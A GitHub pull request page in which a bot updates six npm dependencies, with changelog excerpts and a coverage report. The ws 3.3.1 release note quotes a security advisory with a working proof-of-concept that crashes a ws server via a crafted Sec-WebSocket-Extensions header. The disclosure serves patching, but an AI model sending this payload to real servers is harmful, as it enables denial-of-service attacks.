Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Update 6 dependencies from npm #2286

Merged
merged 7 commits into from
Nov 10, 2017
Merged

Update 6 dependencies from npm #2286

merged 7 commits into from
Nov 10, 2017

Conversation

dependencies[bot]
Copy link

@dependencies dependencies bot commented Nov 10, 2017
edited by Hypnosphi
Loading

Overview

The following dependencies have been updated:

  • eslint-plugin-jest in / from 21.2.0 to 21.3.2
  • prettier in / from 1.8.1 to 1.8.2
  • @types/node in addons/knobs from 8.0.50 to 8.0.51
  • @types/react in addons/knobs from 16.0.21 to 16.0.22
  • ws in app/react-native from 3.3.0 to 3.3.1
  • react-render-html in addons/comments from 0.5.2 to 0.6.0

Details

Dependencies.io has updated eslint-plugin-jest (a npm dependency in /) from 21.2.0 to 21.3.2.

21.3.2

No content found. Please open an issue at https://github.com/dependencies-io/support if you think this content could have been found.

21.3.1

No content found. Please open an issue at https://github.com/dependencies-io/support if you think this content could have been found.

21.3.0

No content found. Please open an issue at https://github.com/dependencies-io/support if you think this content could have been found.

Dependencies.io has updated prettier (a npm dependency in /) from 1.8.1 to 1.8.2.

1.8.2

link

Dependencies.io has updated @types/node (a npm dependency in addons/knobs) from 8.0.50 to 8.0.51.

8.0.51

No content found. Please open an issue at https://github.com/dependencies-io/support if you think this content could have been found.

Dependencies.io has updated @types/react (a npm dependency in addons/knobs) from 16.0.21 to 16.0.22.

16.0.22

No content found. Please open an issue at https://github.com/dependencies-io/support if you think this content could have been found.

Dependencies.io has updated ws (a npm dependency in app/react-native) from 3.3.0 to 3.3.1.

3.3.1

Bug fixes

  • Fixed a DoS vulnerability (c4fe466).

A specially crafted value of the Sec-WebSocket-Extensions header that
used Object.prototype property names as extension or parameter names
could be used to make a ws server crash.

const WebSocket = require('ws');
const net = require('net');

const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor';  // or ',;constructor'

  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r\n'
  ].join('\r\n');

  const socket = net.connect(3000, function () {
    socket.resume();
    socket.write(request);
  });
});

The vulnerability has been privately reported by Nick Starke and
Ryan Knell of Sonatype Security Research and promptly fixed. Please
update now!

Dependencies.io has updated react-render-html (a npm dependency in addons/comments) from 0.5.2 to 0.6.0.

0.6.0

No content found. Please open an issue at https://github.com/dependencies-io/support if you think this content could have been found.

@codecov
Copy link

codecov bot commented Nov 10, 2017
edited
Loading

Codecov Report

Merging #2286 into master will not change coverage.
The diff coverage is n/a.

Impacted file tree graph

@@           Coverage Diff           @@
##           master    #2286   +/-   ##
=======================================
  Coverage   22.14%   22.14%           
=======================================
  Files         268      268           
  Lines        5893     5893           
  Branches      710      702    -8     
=======================================
  Hits         1305     1305           
- Misses       4055     4066   +11     
+ Partials      533      522   -11
Impacted Files Coverage Δ
app/react/src/server/config/babel.js 0% <0%> (-100%) ⬇️
app/react/src/server/babel_config.js 0% <0%> (-77.42%) ⬇️
app/react/src/server/utils.js 0% <0%> (-53.58%) ⬇️
lib/ui/src/modules/ui/libs/filters.js 47.36% <0%> (ø) ⬆️
lib/ui/src/modules/shortcuts/actions/shortcuts.js 6.25% <0%> (ø) ⬆️
addons/storyshots/src/require_context.js 0% <0%> (ø) ⬆️
lib/ui/src/modules/ui/containers/layout.js 12.5% <0%> (ø) ⬆️
addons/storyshots/src/storybook-channel-mock.js 0% <0%> (ø) ⬆️
lib/ui/src/modules/ui/containers/left_panel.js 25.71% <0%> (ø) ⬆️
lib/ui/src/modules/ui/configs/handle_routing.js 24.73% <0%> (ø) ⬆️
... and 25 more

Continue to review full report at Codecov.

Legend - Click here to learn more
Δ = absolute <relative> (impact), ø = not affected, ? = missing data
Powered by Codecov. Last update b5135ee...03507ce. Read the comment docs.

@Hypnosphi Hypnosphi merged commit e3d4397 into master Nov 10, 2017
@Hypnosphi Hypnosphi deleted the dependencies.io-update-build-61.0.0 branch November 10, 2017 21:08
@dependencies dependencies bot mentioned this pull request Apr 16, 2018
Merged
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@Hypnosphi Hypnosphi Hypnosphi approved these changes

Assignees

@Hypnosphi Hypnosphi

Labels
dependencies
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
3 participants
@Hypnosphi @phated @dependencies-bot